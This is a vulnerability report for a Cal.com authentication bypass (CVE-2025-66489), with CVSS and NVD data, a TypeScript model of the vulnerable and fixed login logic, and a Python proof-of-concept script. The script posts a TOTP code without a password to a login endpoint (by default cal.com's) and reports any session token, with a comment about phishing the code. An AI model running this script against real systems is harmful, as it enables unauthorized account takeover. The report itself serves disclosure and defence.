Security Vulnerability Report
CVE-2025-66489 CVSS 9.8 CRITICAL

CVE-2025-66489

Published: 2025-12-03 20:16:27
Last Modified: 2026-02-13 16:03:36

Description

Cal.com is open-source scheduling software. Prior to version 5.9.8, a flaw in the login credentials provider allows an attacker to bypass password verification when a TOTP code is provided, potentially gaining unauthorized access to user accounts. The issue is caused by faulty conditional logic in the authentication flow (CWE-303, Incorrect Implementation of Authentication Algorithm). The vulnerability is fixed in version 5.9.8.
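
The "problematic conditional logic" in the description is easiest to see on a minimal model of a credentials provider. The TypeScript below is an added illustration written for this report, not Cal.com's code, and the type and function names (User, Credentials, authorizeVulnerable, authorizeFixed) as well as the exact shape of the faulty branch are assumptions. It places a password check inside a branch that is skipped whenever a totpCode is present, beside a corrected flow that verifies the password unconditionally and treats TOTP as an additional factor. The TOTP routine is a standard RFC 6238 implementation so the second-factor path is exercised for real.

```typescript
// Added illustration for CVE-2025-66489 (not Cal.com's code). Models a
// credentials-provider authorize() whose password check is skipped when a
// TOTP code is supplied, beside the corrected logic. All type and function
// names here are assumptions made for the demonstration.
import { createHmac, randomBytes, scryptSync, timingSafeEqual } from "crypto";

interface User {
  email: string;
  salt: Buffer;
  passwordHash: Buffer; // scrypt(password, salt, 32)
  totpSecret?: Buffer;  // set only when the account has 2FA enabled
}

interface Credentials {
  email: string;
  password?: string;
  totpCode?: string;
}

function hashPassword(password: string, salt: Buffer): Buffer {
  return scryptSync(password, salt, 32);
}

function verifyPassword(password: string | undefined, user: User): boolean {
  if (!password) return false;
  return timingSafeEqual(hashPassword(password, user.salt), user.passwordHash);
}

// RFC 6238 TOTP: HMAC-SHA1 over the 8-byte big-endian step counter,
// dynamic truncation, 6 digits.
function totp(secret: Buffer, step: number): string {
  const counter = Buffer.alloc(8);
  counter.writeUInt32BE(Math.floor(step / 4294967296), 0);
  counter.writeUInt32BE(step >>> 0, 4);
  const mac = createHmac("sha1", secret).update(counter).digest();
  const off = mac[mac.length - 1] & 0x0f;
  const bin =
    ((mac[off] & 0x7f) << 24) | (mac[off + 1] << 16) | (mac[off + 2] << 8) | mac[off + 3];
  return ("000000" + String(bin % 1000000)).slice(-6);
}

function verifyTotp(code: string | undefined, user: User, nowMs: number): boolean {
  const secret = user.totpSecret;
  if (!secret || !code) return false;
  const step = Math.floor(nowMs / 1000 / 30);
  // tolerate one 30 s step of clock skew in either direction
  return [step - 1, step, step + 1].some((s) => totp(secret, s) === code);
}

// VULNERABLE shape: the password branch is entered only when no totpCode
// was sent, so any request that carries a totpCode never has its password
// checked. With 2FA off the TOTP branch is skipped too and an arbitrary
// code logs the attacker in; with 2FA on, a valid TOTP alone is enough.
function authorizeVulnerable(user: User, creds: Credentials, nowMs: number): boolean {
  if (!creds.totpCode) {
    if (!verifyPassword(creds.password, user)) return false;
  }
  if (user.totpSecret && !verifyTotp(creds.totpCode, user, nowMs)) return false;
  return true;
}

// FIXED shape: the password is always verified; TOTP is a second factor
// required in addition when 2FA is enabled, never a substitute for it.
function authorizeFixed(user: User, creds: Credentials, nowMs: number): boolean {
  if (!verifyPassword(creds.password, user)) return false;
  if (user.totpSecret && !verifyTotp(creds.totpCode, user, nowMs)) return false;
  return true;
}

// Constructed fixture accounts (not real data).
function makeUser(email: string, password: string, with2fa: boolean): User {
  const salt = randomBytes(16);
  return {
    email,
    salt,
    passwordHash: hashPassword(password, salt),
    totpSecret: with2fa ? randomBytes(20) : undefined,
  };
}

function demo(): Record<string, boolean> {
  const nowMs = 1700000000000; // fixed clock so the valid TOTP is reproducible
  const noMfa = makeUser("alice@example.invalid", "correct horse", false);
  const mfa = makeUser("bob@example.invalid", "battery staple", true);
  const validCode = totp(mfa.totpSecret as Buffer, Math.floor(nowMs / 1000 / 30));
  const bogus = { email: noMfa.email, password: "wrong", totpCode: "000000" };
  const totpOnly = { email: mfa.email, totpCode: validCode };
  const legit = { email: mfa.email, password: "battery staple", totpCode: validCode };
  return {
    vulnerableNoMfaBogusCode: authorizeVulnerable(noMfa, bogus, nowMs), // true: bypass
    fixedNoMfaBogusCode: authorizeFixed(noMfa, bogus, nowMs),           // false
    vulnerableTotpOnly: authorizeVulnerable(mfa, totpOnly, nowMs),      // true: bypass
    fixedTotpOnly: authorizeFixed(mfa, totpOnly, nowMs),                // false
    fixedLegitimate: authorizeFixed(mfa, legit, nowMs),                 // true
  };
}

console.log(demo());
```

The two bypass rows are the whole bug: once the first-factor check is conditional on the absence of the second factor, the second factor is not a second factor. The fix keeps the password check unconditional and adds TOTP on top. The model deliberately leaves out concerns a real provider must also handle (single-use enforcement of each TOTP value and rate limiting of both factors), since they are independent of the logic error shown here.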

CVSS Details

CVSS 3.1 Score (NVD, primary)
9.8
Severity
CRITICAL
CVSS 3.1 Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 Score (CNA, secondary)
9.9 CRITICAL
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:N
Weakness
CWE-303 (Incorrect Implementation of Authentication Algorithm)

Configurations (Affected Products)

cpe:2.3:a:cal:cal.com:*:*:*:*:*:*:*:* - VULNERABLE
Cal.com < 5.9.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66489 PoC - Cal.com Authentication Bypass
#
# Caveat: the endpoint path and the "sessionToken"/"token" response fields
# below are this PoC's assumptions, not values taken from the advisory.
# Confirm the credentials-login route and the response shape of the target
# version (< 5.9.8) before trusting the success check.
import requests

TARGET_URL = "https://cal.com/api/auth/login"  # point this at a host you are authorized to test
TARGET_EMAIL = "[email protected]"
TOTP_CODE = "123456"  # Obtained via social engineering/phishing


def exploit_auth_bypass():
    """
    Exploit for CVE-2025-66489: Cal.com TOTP bypass.
    Demonstrates bypassing password verification with a valid TOTP code.
    """
    # Construct the request: supply a TOTP code and no usable password so the
    # flawed conditional skips password verification
    payload = {
        "email": TARGET_EMAIL,
        "totpCode": TOTP_CODE,
        # Intentionally omit or manipulate the password field
        "password": None,
    }
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-66489-PoC)",
    }
    try:
        response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

    # Check whether authentication succeeded (bypass worked)
    if response.status_code == 200:
        try:
            data = response.json()
        except ValueError:
            data = {}
        token = data.get("sessionToken") or data.get("token")
        if token:
            print("[+] AUTHENTICATION BYPASS SUCCESSFUL!")
            print(f"[+] Session Token: {token}")
            return token

    print(f"[-] Exploit failed. Status: {response.status_code}")
    print(f"[-] Response: {response.text}")
    return None


if __name__ == "__main__":
    print("CVE-2025-66489 - Cal.com Authentication Bypass Exploit")
    print("=" * 60)
    exploit_auth_bypass()

References

https://github.com/calcom/cal.com/security/advisories/GHSA-9r3w-4j8q-pw98 (Third Party Advisory, Exploit)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66489", "sourceIdentifier": "[email protected]", "published": "2025-12-03T20:16:27.057", "lastModified": "2026-02-13T16:03:36.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cal.com is open-source scheduling software. Prior to 5.9.8, A flaw in the login credentials provider allows an attacker to bypass password verification when a TOTP code is provided, potentially gaining unauthorized access to user accounts. This issue exists due to problematic conditional logic in the authentication flow. This vulnerability is fixed in 5.9.8."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-303"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cal:cal.com:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.9.8", "matchCriteriaId": "97D8E07A-0C42-4AD4-8270-3929F5A4D472"}]}]}], "references": [{"url": "https://github.com/calcom/cal.com/security/advisories/GHSA-9r3w-4j8q-pw98", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}